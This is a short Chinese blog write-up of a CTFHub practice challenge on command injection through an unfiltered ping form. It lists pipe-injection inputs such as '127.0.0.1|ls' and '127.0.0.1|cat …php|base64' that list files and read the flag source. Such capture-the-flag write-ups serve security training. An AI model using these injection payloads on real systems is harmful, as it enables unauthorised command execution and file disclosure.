CTFHUB-技能树-Web题-RCE(远程代码执行)-远程包含-命令注入

  • 开发
  • 16

CTFHUB-技能树-Web题-RCE(远程代码执行)-远程包含-命令注入

ping -c 4 192.168.1.1表示ping4次

查看代码,需要输入ip地址

在这里插入图片描述

尝试输入127.0.01,返回了ping包情况

在这里插入图片描述

由于没有过滤,直接拼接cmd命令查看即可

127.0.0.1|ls

在这里插入图片描述

127.0.0.1|cat 25653369915628.php

在这里插入图片描述

提交了[1]没有东西
可以构造(也可以直接查看源代码)

127.0.0.1|cat 25653369915628.php|base64

在这里插入图片描述

对base64进行解密

在这里插入图片描述

阅读全部

相关推荐

  3. RCE远程命令执行)漏洞详解

    2024-07-16 22:26:04       35 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-16 22:26:04       70 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-16 22:26:04       74 阅读

  9. 在Django里面运行非项目文件

    2024-07-16 22:26:04       62 阅读

  19. Python语言-面向对象

    2024-07-16 22:26:04       72 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-07-16 22:26:04       66 阅读

热门阅读

  10. 华为OD机试(C卷,100分)- 求最多可以派出多少支团队、部门人力分配

    2024-07-16 22:26:04       24 阅读

  14. [笔试题] C语言部分练习2

    2024-07-16 22:26:04       18 阅读

  17. Mysql关闭严格模式

    2024-07-16 22:26:04       18 阅读

  22. OTP的变化时间

    2024-07-16 22:26:04       21 阅读

  25. xxs攻击的攻击和防范

    2024-07-16 22:26:04       23 阅读

  27. Kotlin 内联

    2024-07-16 22:26:04       23 阅读

  29. 搭建远程控制(远程桌面)服务器

    2024-07-16 22:26:04       23 阅读

  30. 深入解析rsync:定义、架构、原理、应用场景及实战指南

    2024-07-16 22:26:04       19 阅读